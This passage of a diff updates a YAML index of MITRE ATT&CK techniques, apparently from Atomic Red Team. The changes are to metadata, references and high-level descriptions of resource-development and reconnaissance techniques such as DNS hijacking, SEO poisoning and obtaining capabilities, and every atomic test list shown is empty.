         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -55187,7 +55847,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -55246,54 +55905,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -55304,22 +55919,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -55382,37 +56041,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -55436,11 +56096,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -55498,17 +56161,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -55516,7 +56180,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -55530,7 +56194,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -55563,11 +56227,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -55589,7 +56260,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -55607,47 +56278,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -55656,21 +56290,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -55710,7 +56380,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -55729,15 +56399,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -55745,19 +56413,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -55791,55 +56459,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
